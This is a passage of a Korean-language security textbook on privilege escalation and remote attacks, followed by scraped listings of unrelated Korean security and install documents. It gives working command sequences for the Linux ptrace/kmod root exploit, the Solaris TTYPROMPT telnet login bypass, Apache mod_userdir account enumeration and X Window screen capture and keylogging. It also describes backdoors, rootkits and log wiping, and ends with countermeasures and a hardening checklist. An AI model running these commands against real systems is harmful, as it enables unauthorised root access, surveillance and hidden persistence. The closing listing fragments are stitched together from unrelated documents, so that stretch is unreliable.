23 해킹기술은보안상태가가장허술한호스트의취약점에대해서우선적으로공격한다. 일반적인공격시사용자로그인레벨의접근을시도하고유저권한획득하면로컬에서루트권한을획득하기위한공격을시도한다 IMAP에대한취약점및해킹방법취득 일반사용자계정으로부터 Root, Administrator 와같은특권계정의권한을획득한다. - Local attack: 일반사용자계정을가지고있는컴퓨터혹은현재해커앞에놓인컴퓨터에대한공격을시도한다. - Remote attack: 어떠한계정도없으며멀리떨어져있는컴퓨터에대한공격( 주로서버를공격대상으로선정). 일반사용자로부터슈퍼유저의권한을얻는것이원격에서바로수퍼유저의권한을얻는것보다손쉬움. Remote attack 역시바로슈퍼유저의권한을얻는것이어렵다면일반사용자의권한을얻는것을목표로한다. 사전공격단계에서입수한 target에대한정보를이용하여 target시스템에유효한 exploit을다운로드받는다. exploit code를다운받은후필요시컴파일과정을거치고바이너리파일일경우에는컴파일과정없이바로사용이가능하다 IMAP에대한해킹툴및소스다운로드

24 라. Exploit code 실행 마. 백도어설치 hacker ~$./imap_exploit bigwidget.com : 첫단계로익스플로잇코드를컴파일한다. hacker ~$ telnet bigwidget.com Bigwidget:~# cd / etc Bigwidget:~# cat./hosts 해커는공격에서침입을용이하게하기위해백도어를만들어둔다.( 예.back orifice, rootkit). Back Orifice: cdc(cult Dead Cow) 라는단체에서만든프로그램으로 Server 프로그램과 Client 프로그램으로구성되어있으며인스톨한후 client에서 Server 를제어가능. Rootkit: 다른시스템에침입하기위한프로그램등이다양하지만, linux 와 solaris에설치가능한패키지. 원격으로슈퍼유저로그인이가능할뿐만아니라침입했다는사실을숨기는기능까지있기때문에매우위험하다. 실행결과방화벽을통과하여서버의 root 권한을얻음. 이로써더이상의방어는존재하지않는다. BigWidget 을대상으로공격할때사용된프로그램(Exploits) 은암호를물어보지도않고 root 로로그온할수있도록만든다. 수많은해커들의정보교환용웹사이트에는그밖에도수천가지이상의실제보안취약점이존재한다. 이러한취약점들은현재사용되고있는모든운영체제들또한마찬가지이다 백도어설치과정 3-7. 공격대상에대해서익스플로잇코드실행결과 추적을숨기고백도어설치 - 로그파일수정 - Sniffers 설치 - 들키지않도록트로이목마를설치 - "Rootkit" 이라는툴사용 - Rootkit는운영체제마다존재 일단해킹에성공한해커는자신의방문을관리자가눈치채지못하도록침입흔적을지운다. 해커들에의해백도어의기능이더욱강력해지고있다

25 백도어로써 Netbus 에대해서알아본다. -Netbus : 초보자들도사용하기쉽고강력한기능들로만구성되어있어최근들어해킹에 많이사용된다. - 구성파일: patch.exe - 서버파일, netbus.exe - 클라이언트파일 - 기 능: 서버컴퓨터의키보드로타이핑된모든내용을알수있음. 서버컴퓨터에서현재작업중인화면을캡처하여 bmp 파일로저장. 다른클라이언트가접속하지못하도록비밀번호를설정가능. 서버컴퓨터가외부에접속할경우변경된 IP와접속사실을클라이언트의 이메일주소로전송. Part 3 2. 취약점리스트및해킹기술가. 권한상승해킹기술 프로그램은아래와같이검색및웹사이트를이용하여다운받는다. 제목 Linux Kernel 2.2.x-2.4.x ptrace/kmod local root exploit 개요 kernel/kmod.c 부분에서 race condition 을발생시켜비정상적인상태에서프로세스를생성하고, 시스템관리자권한으로새로생성된 modprobe를 ptrace system call을이용해서제어함으로써로컬사용자가시스템의관리자권한(root) 을획득할수있다 3-9. 백도어및트로이목마프로그램다운로드의예 원리 커널 이상에서는 setuid가설정되어있는프로그램의경우 ptrace에의해 trace 되어지는것을금지하고있지만, 본 exploit에서사용되어진프로세스의경우에는초기에는 setuid가설정이되어있지않다가커널내부에서 euid와 egid값을 0으로변경함으로인해 setuid가설정된프로세스에대한 ptrace 금지규칙을우회할수있다. 즉, ptrace로 attach를시도하는시점에서는일반프로세스상태로있다가커널에의해 내부적으로변경됨으로인해, 정상적인 ptrace 를수행할수있다. 아래의코드는커널내부에는해당프로세스의 euid와 egid값을 0으로 변경하는부분으로문제로지적된부분이다. kmod.c 에서 race conditon 이일어난다 /* Give kmod all effective privileges.. */ 133 curtask->euid = curtask->fsuid = 0; 134 curtask->egid = curtask->fsgid = 0; 135 cap_set_full(curtask->cap_effective); 137 /*Allowexecveargstobeinkernelspace.*/ 138 set_fs(kernel_ds); 140 /* Go, go, go... */ 141 if (execve(program_path, argv, envp) < 0) 142 return -errno; 143 return 0;

26 원리 동작환경 A 프로세스에서특정모듈의기능을요청하면, kmod 에서modprobe라는특정모듈을메모리상에올리는프로세스 C 가생성된다. kmod에서 modprobe 를요청하는루틴이작동될때(135 줄실행후) Context Switching 이될경우, B라는악의적인프로세스가이프로세스 C에 PTRACE ATTACH( CHILD 로만듬 ) 한다음악의적인코드를집어넣을수있다. modprobe 는 root 권한으로작동되므로악의적인 local 사용자는 root 권한을획득할수있다. Atomic 으로실행돼야하는부분에 ptrace system call 로접근할수있는점에서문제가발생된다 Linux Kernel 2.2.x & 2.4.x 모든시스템 나. 제목 개요 TTYPROMPT 취약점해킹기술 Solaris TTYPROMPT 취약점(telnet) Solaris2.6,7,8 버전의 /bin/login은환경변수 TTYPROMPT와긴사용자명을입력에대한취약점을가진다. 이취약점은공격자가원격지에서 Solaris 시스템으로패스워드없이 login 이가능하다. 다운로드 설치순서 # gcc o ptrace-kmod ptrace-kmod 활 용 법 $./ptrace-kmod sh-2.05 원리 별도의컴파일된코드를요구하지않으며단지공격자가간단히 telnet prompt 에서 TTYPROMPT 환경변수를 6문자크기로정의하고공격할대상에연결한뒤, 사용자명과 64 문자의 'c' 와 ' n' 을입력하면패스워드없이 login 이가능하다. 원격지에서 root login이허락되었다면 root로도 login 이가능하다. ( 예제 ) localhost % telnet telnet>environ define TTYPROMPT abcdef telnet> o localhost SunOS 5.8 bincccccccccccccccccccccccccc ccccccccccccccccccccccccccc ccccccccccc n Last login: whenever $whoami bin 동작환경 취약시스템 : Solaris 2.6, 7, 8 (sparc/x86)

27 다운로드 &id=89 다. 제목 apache서버계정정보취득기술 Apache 1.3.* mod_userdir remote users disclosure Exploit # gcc o exploit exploit.c 설치순서 (Linux) # gcc o exploit exploit.c lnsl lsocket (Solaris) 개요 일정한조건과 userlist.txt를통해일치되는 apache서버의내부사용자들의계정을알아냄으로써, 해커에게좀더쉽게공격대상의계정정보를취득한다 활용법 [ 사용법 ]./exploit [-u user] [-p port] <-h target> (default user/port : bin/23) #./exploit h victim #./exploit h victim u ro 각시스템및버전에해당된패치를 적용한다.( ) Solaris 8: Solaris 8x86: Solaris 7: Solaris 7x86: 대응방안 Solaris 2.6: Solaris 2.6x86: ( 예) Solaris 8 (sparc) 의경우 원리 동작환경 < 원격사용자검색조건 > 1. httpd l 명령수행결과에 mod_userdir.c가있을경우 2. 해당계정의디렉토리밑에 public_html 이있을경우 3. public_html 이없어도계정이존재한다면 http 쿼리를해보면 403 이란반환값을얻을수있다. # nc 80 head /~root http/1.0 HTTP/ Forbidden Date: Tue, 13 Jan :18:22 GMT Server: Apache/ (Unix) PHP/4.0.6 Connection: close Content-Type: text/html; charset=iso apache 1.3.x (Linux / BSD) 다운로드 설치순서 # gcc o m00-apache-w00t m00-apache-w00t.c 활용법 #./m00-apache-w00t -t u userlist.txt -l userlsy [*] Apache 1.3.* remote users disclosure exploit by m00 Security. [*] Checking http server [localhost:80]... Apache => yes Vulnerable => yes OS => [*] Searching for system accounts # unzip zip # patchadd

28 활용법 대응방안 root => yes ( public_html 이있을때) webmaster => lsy => yes kyun => yes user1 => user2 => user3 => [*] Searching complete. 7 users checked 3 users found [*] Searching for system accounts... test => no ( 계정밑에 public_html 이없을때) 1. 가상호스팅을이용합니다. (DocumentRoot를 public_html로주지않고다른디렉토리로주게되면, 탐지를막을수있다.) 2. /etc/passwd 파일을 640등으로주어소유자와그룹소유자만이읽을수있도록하면탐지자체가되지않는다. 라. 제목 개요 원리 X Window X Window 인증해킹기술 X Window는클라이언트서버구조이기때문에사용자를인증하는모듈이포함돼있지만 X 프로토콜은암호화되어있지않기때문에인증을사용하더라도보안에취약하다고할수있다. 공격자는인증메커니즘을악용하여새로운터미널생성, 화면훔쳐보기, 키보드입력가로채기등의공격을할수있다 X Window 인증방식에는크게두가지방식이있다. 하나는호스트인증방식이고다른하나는토큰인증방식이다. 인증을받은클라이언트는 X 서버에터미널생성, 화면훔쳐보기, 키보드입력가로채기등이가능하다. < 호스트인증방식 > 호스트인증방식을사용하려면 xhost 명령을사용해야한다. xhost 의사용방법은다음과같다. xhost + : 모든호스트가로컬 X 서버에접속할수있도록한다. xhost - : 모든호스트가로컬 X 서버에접속할수없도록한다. xhost : 은 X 서버에접속을허용한다. < 토큰인증방식 > 호스트인증방식은클라이언트의 IP에기반한접근제어를수행하기때문에세밀한제어를하지못하는단점이있다. 토큰인증방식을사용하면각사용자에대한인증을할수있다. 토큰인증방식은MIT-MAGIC-COOKIE 방법이라고도불린다. 이방법에서는 128bit 의매직쿠키(magic cookie) 를 X 서버가기억하고있다가 X 클라이언트가접속요청을할때이쿠키에따라접근제어를수행한다. 즉 X 서버는 X 클라이언트가보내준매직쿠키가자신이갖고있는매직쿠키와같은경우에만접근을허용한다. 사용자는이매직쿠키를 $HOME/.Xauthority 파일에저장하는데이파일의접근권한은오직자신만이읽을수있도록설정해주어야한다. 왜냐하면이파일을읽을수있는모든사용자는 X 서버에접속할수있기때문이다 동작환경 UNIX 계열

29 Part 3 다운로드 3. 해킹대응및보안설정 설치순서 $ gcc o xkey xkey.c -1X11 lm I/usr/include/X11 L/sur/X11R6/lib 1. 다른접근제어와마찬가지로 xhost 를사용할때도기본적으로모든호스트에금지규칙을설정한다음특정호스트만을허용하는것이좋다. [attacker] $ xhost [attacker] $ xhost 대응방안 [attacker] $ xhost X Window 프로토콜을보호하는가장좋은방법은 X Window 트래픽을 SSH 를통해터널링하는것이다. 3. Firewall을이용하여 X Window 관련포트를차단한다. 활용법 < 새로운터미널생성 > 공격자는 X 서버를실행중인일반사용자의컴퓨터에자신이원하는프로그램을띄울수있다. [attacker] $ /usr/x11r6/bin/hanterm ls display :0.0 & < X Window 화면훔쳐보기 > 공격자는원격지에서다른사용자의 XWindow 화면을훔쳐볼수있다. [attacker] $ xwd root display :0.0 > screen.sav 이제 screen.sav 파일안에 의화면이캡쳐되어있다이파일을보려면다음과같이 xwud 프로그램을사용한다. [attacker] $ xwud in screen.sav < 키보드입력가로채기 > 공격자는 X 서버사용자의키보드입력을가로챌수도있다. [attacker] $./xkey :0.0 > keylog.txt 본서에서는해킹대응및보안설정부분에대해서체크리스트를제공하며이를기반으로체계적인해킹대응및보안설정을수행할수있도록한다. 서비스분류점검항목점검내용점검방법 1. NFS 서비스 2. FTP 서비스 3. SENDMA -IL 서비스 NFS 실행 NFS 서비스실행여부 ps -ef grep nfs NFS 설정공유설정의적절성 /etc/vfstab 실행 사용자제한 버전정보 명령어제한 로깅수준 FTP 서비스가실행여부 Anonymous 접속허용 /etc/ftpusers 취약점이없는 Ftp 서비스버전을유지 expn, vrfy 명령어사용을제한 로깅수준적절성 버전관리취약점이없는 Sendmail 버전을유지 ps -ef grep ftp grep -v ^# /etc/inetd.conf 4. SNMP 서비스 실행 설정 SNMP 서비스가실행되고있는가? SNMP Community String의 적절한 설정 5. DNS 서비스 실행 BIND 서비스가운영중인가? 버전관리취약점이없는버전의 BIND를사용

30 실행 실행권한 Apache 가실행되고있는가? Apache가 root 권한이 아닌 사용자 권한( 예. Nobody) 로 실행되고 있는 가? 불필요한계정이존재하는가? 불필요하게쉘이부여된계정이존재하는가? cat/etc/passwd,last user_name cat /etc/passwd 6. APACHE 서비스 디렉터리불필요한파일제거환경설정 APACHE의 DocumentRoot 디렉터리를기본디렉터리에서다른디렉터리로변경 불필요한 CGI 스크립트를제거 디렉터리리스팅을금지 심볼릭링크의사용을금지 SSI(Server Side Include) 페이지가 스크립트나프로그램을실행할수없 httpd.conf 파일설정도록하였는가? CGI의실행을특정한디렉터리에서만가능하도록설정 7. 사용자보안 계정 패스워드 그룹권한설정이적절한가? 사용가능한쉘을제한하는가? root 이외에 UID가 0인사용자가존재하는가? root 이외에 GID가 1인사용자가존재하는가? cat /etc/group cat/etc/passwd, /etc/shells cat /etc/passwd cat /etc/passwd 패스워드가쉐도우(Shadow) 화되어 /etc/passwd, 저장되는가? /etc/shadow 패스워드의최소길이가설정되어있 cat 는가? /etc/default/passwd cat 패스워드에이징(Aging) 이이루어지 /etc/default/passwd, 고있는가? /etc/shadow 패스워드가없는사용자가존재하는 /etc/shadow 가? PUT/GET METHOD 의사용을제한 쉬운패스워드를사용하는사용자가존재하는가? Crack Tool 웹서버정보헤더정보를숨기고있는가? 은닉 로그관리 access_log의 포맷과 경로는 적절한 가? 버전관리취약점이없는 APACHE 버전을유지 환경변수설정 (UMASK, PATH) UMASK 설정이적절한가? Shell Script /etc/passwd PATH 가적절히설정되어있는가? Shell Script /var/spool/cron cron과 at에등록된작업중불필요하 /crontabs/* 거나의심스러운사용자의것( 특히, SCHEDULING /var/spool/cron/atjob lp, uucp 관련) 이존재하지않는가? (at, cron) s/ SCHEDULING 작업을일정사용자만 /etc/cron.d/*.deny, 허용하고있는가? *.allow

31 8. 네트워크접근제어 로그인 TCP WRAPPER 원격 root 로그인을제한 IDLE 타임아웃설정 TELNET 접속시불필요한도움말메시지표시하는것을막는다로그인시접근경고메시지표시 TCP WRAPPER가운영 /etc/hosts.allow 파일의설정 /etc/default/login, /dev/console /etc/default/login, TIMEOUT=xxx /etc/motd grep tcpd /etc/inetd.conf /etc/hosts.deny 파일의설정 취약한 R-COMMAN DS 서비스 R-COMMANDS 있는가? 서비스를 사용하고 netstat -na grep 512, 513, 514 sadmind 9. 네트워크기본서비스 취약한 RPC 서비스실행 rquotad rpc.rusersd rpc.sprayd rpc.rwalld rpc.rstatd rpc.rexd rpc.ttdbserverd netstat -na grep 111 grep -v ^# /etc/inetd.conf grep rpc ps -ef grep rpc, sadmind, rquotad rpc.cmsd talk uucp 기타취약한서비스실행 finger time echo discard grep -v ^# /etc/inetd.conf daytime chargen, dtspcd,printer -61-

IPC$ 에 대한 정보

IPC$ 에 대한 정보 제목 : IPC$ 에대한정보 ( 널세션 ) 목차 : 1. 널세션의개요 2. Null Sessions 에취약점 3. 관리폴더제거방법 4. 익명계정으로부터접근제어하는방법 5. 참고자료 자료제공및자료출처 : NTFAQ 운영자 ( http://www.ntfaq.co.kr ) 1. 널세션의개요널세션 (Null Session) 접속은윈도우 NT/2000으로의인증받지않은접속이다.

More information

untitled

untitled Oracle DBMS 로그인의접근제어우회 취약점분석 2006. 2. 9 인터넷침해사고대응지원센터 (KISC) 본보고서의전부나일부를인용시반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 룰명시하여주시기바랍니다. 개요 o 2005년이후 Oracle Critical Patch Update(CPU) 는 Oracle사제품대상으로다수의보안패치및보안패치와관련된일반패치를발표하는주요수단임

More information

Microsoft Word - ntasFrameBuilderInstallGuide2.5.doc

Microsoft Word - ntasFrameBuilderInstallGuide2.5.doc NTAS and FRAME BUILDER Install Guide NTAS and FRAME BUILDER Version 2.5 Copyright 2003 Ari System, Inc. All Rights reserved. NTAS and FRAME BUILDER are trademarks or registered trademarks of Ari System,

More information

Windows 8에서 BioStar 1 설치하기

Windows 8에서 BioStar 1 설치하기 / 콘텐츠 테이블... PC에 BioStar 1 설치 방법... Microsoft SQL Server 2012 Express 설치하기... Running SQL 2012 Express Studio... DBSetup.exe 설정하기... BioStar 서버와 클라이언트 시작하기... 1 1 2 2 6 7 1/11 BioStar 1, Windows 8 BioStar

More information

Oracle hacking 작성자 : 임동현 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용

Oracle hacking 작성자 : 임동현 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용 Oracle hacking 작성자 : 임동현 (ddongsbrk@naver.com) 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용 Skill List 1. Oracle For Pentest 1. Find TNS Listener (Default 1521 port) (with nmap or amap) 2. Get the

More information

<3035313230325FBBE7B0EDB3EBC6AE5FB5F0C6FAC6AEC6D0BDBABFF6B5E5C3EBBEE0C1A128BCF6C1A4292E687770>

<3035313230325FBBE7B0EDB3EBC6AE5FB5F0C6FAC6AEC6D0BDBABFF6B5E5C3EBBEE0C1A128BCF6C1A4292E687770> 네트워크 장비의 디폴트 로그인 패스워드 취약점 및 대책 2005. 11. 30 본 보고서의 전부나 일부를 인용시 반드시 [자료: 한국정보보호진흥원(KISA)]룰 명시하여 주시기 바랍니다. - 1 - 1. 개요 패스워드 관리는 보안의 가장 기본적인 사항으로 유추하기 어려운 패스워드를 사용하고, 주기적 으로 패스워드를 변경하는 등 패스워드 관리에 신경을 많이 쓰고

More information

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D313939392D382E687770>

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D313939392D382E687770> i ii iii iv v vi 1 2 3 4 가상대학 시스템의 국내외 현황 조사 가상대학 플랫폼 개발 이상적인 가상대학시스템의 미래상 제안 5 웹-기반 가상대학 시스템 전통적인 교수 방법 시간/공간 제약을 극복한 학습동기 부여 교수의 일방적인 내용전달 교수와 학생간의 상호작용 동료 학생들 간의 상호작용 가상대학 운영 공지사항,강의록 자료실, 메모 질의응답,

More information

운영체제실습_명령어

운영체제실습_명령어 운영체제실습 리눅스네트워크기본개념및설정 서 기옥 Contents 네트워크용어정의 IP 주소 네트워크기본명령어 네트워크관리명령어 네트워크설정파일 telnet 서버설정 네트워크용어정의 네트워크 (Network) : 전자적으로데이터를주고받기위한목적으로연결된 2 개이상의컴퓨터시스템 IP 주소와 Ethernet 주소 IP 주소 : 네트워크에연결된시스템을구분하는소프트웨어적인주소

More information

1) 인증서만들기 ssl]# cat >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키

1) 인증서만들기 ssl]# cat   >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키 Lighttpd ( 멀티도메인 ) SSL 인증서신규설치가이드. [ 고객센터 ] 한국기업보안. 유서트기술팀 1) 인증서만들기 [root@localhost ssl]# cat www.ucert.co.kr.key www.ucert.co.kr.crt >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat

More information

1) 인증서만들기 ssl]# cat >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키

1) 인증서만들기 ssl]# cat   >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키 Lighttpd ( 단일도메인 ) SSL 인증서신규설치가이드. [ 고객센터 ] 한국기업보안. 유서트기술팀 1) 인증서만들기 [root@localhost ssl]# cat www.ucert.co.kr.key www.ucert.co.kr.crt >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat

More information

SMB_ICMP_UDP(huichang).PDF

SMB_ICMP_UDP(huichang).PDF SMB(Server Message Block) UDP(User Datagram Protocol) ICMP(Internet Control Message Protocol) SMB (Server Message Block) SMB? : Microsoft IBM, Intel,. Unix NFS. SMB client/server. Client server request

More information

*2008년1월호진짜

*2008년1월호진짜 3. USB 이동식저장장치를이용하여전파되는악성코드분석 1. 개 요 최근 USB 이동식 저장장치를 통하여 전파되는 악성코드에 대한 감염피해가 증가하고 있어 주의가 필요하다. 이번에 확인된 ntion.exe 악성코드는 감염 시, 특정 사이트에 접속하여 추가 악성코드를 다운로드하는 Dropper 기능을 수행한다. 또한, 웹 서버가 감염될 경우는 웹 서버내의 웹 페이지가

More information

ÀÎÅÍ³Ý ÁøÈï¿ø 5¿ù

ÀÎÅÍ³Ý ÁøÈï¿ø 5¿ù 21 5 Korea Internet & Security Agency CONTENTS 2 3 3 3 4 4 5 6 6 7 7 8 11 12 14 14 15 15 16 18 2 22 23 24 24 32 35 36 2 215 Bot 1,7511,315 33.2% 1,621,468 27.7% 285 431 33.9% 295 12 6.9% 44 396 2.% 132

More information

Microsoft PowerPoint - 02_Linux_Fedora_Core_8_Vmware_Installation [호환 모드]

Microsoft PowerPoint - 02_Linux_Fedora_Core_8_Vmware_Installation [호환 모드] 리눅스 설치 Vmware를 이용한 Fedora Core 8 설치 소프트웨어실습 1 Contents 가상 머신 실습 환경 구축 Fedora Core 8 설치 가상 머신 가상 머신 가상 머신의 개념 VMware의 설치 VMware : 가상 머신 생성 VMware의 특징 실습 환경 구축 실습 환경 구축 Fedora Core 8 설치 가상 머신의 개념 가상 머신 (Virtual

More information

*****

***** Korea Internet & Security Agency 21 2 본 보고서 내용의 전부나 일부를 인용하는 경우에는 반드시 출처 [자료:한국인터넷진흥원 인터넷침해대응센터]를 명시하여 주시기 바랍니다. CONTENTS 1 2 2 2 3 3 4 5 5 6 6 7 9 1 12 12 13 13 14 16 18 2 21 22 22 34 37 38 1 212 Bot

More information

untitled

untitled 디렉토리리스팅취약점을이용한게임 DB 서버해킹사고 2006. 8. 3 본보고서의전부나일부를인용시반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 를명시하여주시기바랍니다. 1. 개요중국발해킹의표적이온라인게임서버에까지이어지고있다. 특히중국에는현재수많은게임작업장이있으며, 이곳에서는많은중국인들이단순히게임을즐기는것이아니라아이템매매로인한금전적인이득을목적으로한범죄행위를하고있다.

More information

PWR PWR HDD HDD USB USB Quick Network Setup Guide xdsl/cable Modem PC DVR 1~3 1.. DVR DVR IP xdsl Cable xdsl Cable PC PC DDNS (

PWR PWR HDD HDD USB USB Quick Network Setup Guide xdsl/cable Modem PC DVR 1~3 1.. DVR DVR IP xdsl Cable xdsl Cable PC PC DDNS ( PWR PWR HDD HDD USB USB Quick Network Setup Guide xdsl/cable Modem PC DVR 1~3 1.. DVR DVR IP xdsl Cable xdsl Cable PC PC DDNS (http://ddns.hanwha-security.com) Step 1~5. Step, PC, DVR Step 1. Cable Step

More information

컴퓨터관리2번째시간

컴퓨터관리2번째시간 Company 컴퓨터 관리 참고 자료 PC 운영체제 POST 기능 :, ROM BIOS ( : [F8]) 1. Windows XP Windows XP 사용자 계정 :,,, 강화된 디지털 미디어 지원 기능 : (Windows Movie Maker), CD (Windows Media Player), Windows 홈 네트워크 기능 :, 강화된 시스템 관리 :,

More information

2-11Àå

2-11Àå Chapter 11 script kiddies.... 24.., script kiddies..,... 215 1 TCP/IP., TCP/IP. IP IP..,. IP. TCP/IP TCP( UDP).. 0 65535.., IP, IP,,. (, ). 216 Chapter 11 IP. IP.... 1024 (0 1023 ).... A B. B IP, A. IP,

More information

1. What is AX1 AX1 Program은 WIZnet 사의 Hardwired TCP/IP Chip인 iinchip 들의성능평가및 Test를위해제작된 Windows 기반의 PC Program이다. AX1은 Internet을통해 iinchip Evaluation

1. What is AX1 AX1 Program은 WIZnet 사의 Hardwired TCP/IP Chip인 iinchip 들의성능평가및 Test를위해제작된 Windows 기반의 PC Program이다. AX1은 Internet을통해 iinchip Evaluation 1. What is AX1 AX1 Program은 WIZnet 사의 Hardwired TCP/IP Chip인 iinchip 들의성능평가및 Test를위해제작된 Windows 기반의 PC Program이다. AX1은 Internet을통해 iinchip Evaluation Board(EVB B/D) 들과 TCP/IP Protocol로연결되며, 연결된 TCP/IP

More information

354-437-4..

354-437-4.. 357 358 4.3% 5.1% 8.2% 6.2% 5.6% 6% 5% 5.3% 96.1% 85.2% 39.6% 50.8% 82.7% 86.7% 28.2% 8.0% 60.0% 60.4% 18,287 16,601 (%) 100 90 80 70 60 50 40 86.6% 80.0% 77.8% 57.6% 89.7% 78.4% 82.1% 59.0% 91.7% 91.4%

More information

Network seminar.key

Network seminar.key Intro to Network .. 2 4 ( ) ( ). ?!? ~! This is ~ ( ) /,,,???? TCP/IP Application Layer Transfer Layer Internet Layer Data Link Layer Physical Layer OSI 7 TCP/IP Application Layer Transfer Layer 3 4 Network

More information

Microsoft Word - IIS 웹 서버 보호를 위한 방법.doc

Microsoft Word - IIS 웹 서버 보호를 위한 방법.doc IIS 웹서버보호를위한방법 1. 필요한구성요소만설치한다. 대다수의악의적인공격은초기기본설정으로 IIS 서버가구성되어있다고가정하고취약점을노리는경우가많으므로 FTP나 NNTP, SMTP, Server Extensions 등의서비스들은사용하지않는경우에는설치하지않는것이보안및관리적인측면에서좋다. IIS 를설치한후에 [ 관리도구 ] - [ 인터넷서비스관리자 ] 를실행하여확인해보면다음과같이

More information

USB USB DV25 DV25 REC SRN-475S REC SRN-475S LAN POWER LAN POWER Quick Network Setup Guide xdsl/cable Modem PC DVR 1~3 1.. DVR DVR IP xdsl Cable xdsl C

USB USB DV25 DV25 REC SRN-475S REC SRN-475S LAN POWER LAN POWER Quick Network Setup Guide xdsl/cable Modem PC DVR 1~3 1.. DVR DVR IP xdsl Cable xdsl C USB USB DV25 DV25 REC SRN-475S REC SRN-475S LAN POWER LAN POWER Quick Network Setup Guide xdsl/cable Modem PC DVR 1~3 1.. DVR DVR IP xdsl Cable xdsl Cable PC PC Step 1~5. Step, PC, DVR Step 1. Cable Step

More information

서비스) 와서버( 관리대상서버) 간에자격증명을사용하여서로의 ID 를확인하고서로주고받는데이터를검사하고암호화하는프로세스 이다. 높은인증수준은일반적으로성능의저하를가져올수있지만높은 수준의보안과데이터무결성을제공한다. 기본값 - 관리대상서버에설정되어있는 DCOM 인증수준기본 값을

서비스) 와서버( 관리대상서버) 간에자격증명을사용하여서로의 ID 를확인하고서로주고받는데이터를검사하고암호화하는프로세스 이다. 높은인증수준은일반적으로성능의저하를가져올수있지만높은 수준의보안과데이터무결성을제공한다. 기본값 - 관리대상서버에설정되어있는 DCOM 인증수준기본 값을 설정매뉴얼 연결설정 연결을하기위해서는클라이언트와서버에 Windows Management Instrumentation, Remote Procedure Call(RPC) 서비스 가설치및실행되고있어야한다. Windows Management Instrumentation 서비스는 굳이실행시킬필요는없다. 요청이들어올경우자동실행되므로 연결및쿼리는 DCOM 을사용한다. DCOM은

More information

Network Security - Wired Sniffing 실습 ICNS Lab. Kyung Hee University

Network Security - Wired Sniffing 실습 ICNS Lab. Kyung Hee University Network Security - Wired Sniffing 실습 ICNS Lab. Kyung Hee University Outline Network Network 구조 Source-to-Destination 간 packet 전달과정 Packet Capturing Packet Capture 의원리 Data Link Layer 의동작 Wired LAN Environment

More information

< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B

< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B 월간악성코드은닉사이트탐지 동향보고서 (11 월 ) 2012. 12. 침해사고대응단 인터넷침해대응센터 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 10

More information

UDP Flooding Attack 공격과 방어

UDP Flooding Attack 공격과 방어 황 교 국 (fullc0de@gmail.com) SK Infosec Co., Inc MSS Biz. Security Center Table of Contents 1. 소개...3 2. 공격 관련 Protocols Overview...3 2.1. UDP Protocol...3 2.2. ICMP Protocol...4 3. UDP Flood Test Environment...5

More information

VPN.hwp

VPN.hwp Linksys VPN Router RV042&RV082 VPN Router 용 VPN 터널설정 한국어사용자설명서 V1.0 Table of Content 1 Gateway to Gateway 설정... 1 STEP 1 - Gateway to Gateway 터널생성하기... 1 STEP 2 - 터널정보입력하기... 1 STEP 3 - Gateway to Gateway

More information

Microsoft Word - NAT_1_.doc

Microsoft Word - NAT_1_.doc NAT(Network Address Translation) 1. NAT 개요 1 패킷의 IP 헤더의수신지주소, 발신지주소또는그주소를다른주소로변경하는과정 2 NAT기능을갖는장치를 NAT-BOX라함 ( 시스코라우터, 유닉스시스템, 윈도우의호스트혹은몇개의다른시스템일수있기때문에이렇게지칭하기도함 ) 3 NAT 기능을갖는장치는일반적으로스텁도메인 (Stub-domain)

More information

PCServerMgmt7

PCServerMgmt7 Web Windows NT/2000 Server DP&NM Lab 1 Contents 2 Windows NT Service Provider Management Application Web UI 3 . PC,, Client/Server Network 4 (1),,, PC Mainframe PC Backbone Server TCP/IP DCS PLC Network

More information

커알못의 커널 탐방기 이 세상의 모든 커알못을 위해서

커알못의 커널 탐방기 이 세상의 모든 커알못을 위해서 커알못의 커널 탐방기 2015.12 이 세상의 모든 커알못을 위해서 개정 이력 버전/릴리스 0.1 작성일자 2015년 11월 30일 개요 최초 작성 0.2 2015년 12월 1일 보고서 구성 순서 변경 0.3 2015년 12월 3일 오탈자 수정 및 글자 교정 1.0 2015년 12월 7일 내용 추가 1.1 2015년 12월 10일 POC 코드 삽입 및 코드

More information

정보보안 개론과 실습:네트워크

정보보안 개론과 실습:네트워크 목록화 영동대학교스마트 IT 학부 : 컴퓨터와해킹 이호준 hjlee@yd.ac.kr Contents 학습목표 사용자, 공유정보, 응용프로그램등에대한목록화를이해한다. 여러가지목록화를수행할수있다. SNMP에대해이해한다. SNMP를이용한목록화를수행할수있다. 내용 윈도우시스템의목록화와보안대책 리눅스 / 유닉스시스템의목록화와보안대책 SNMP를이용한목록화와보안대책 2/38

More information

Remote UI Guide

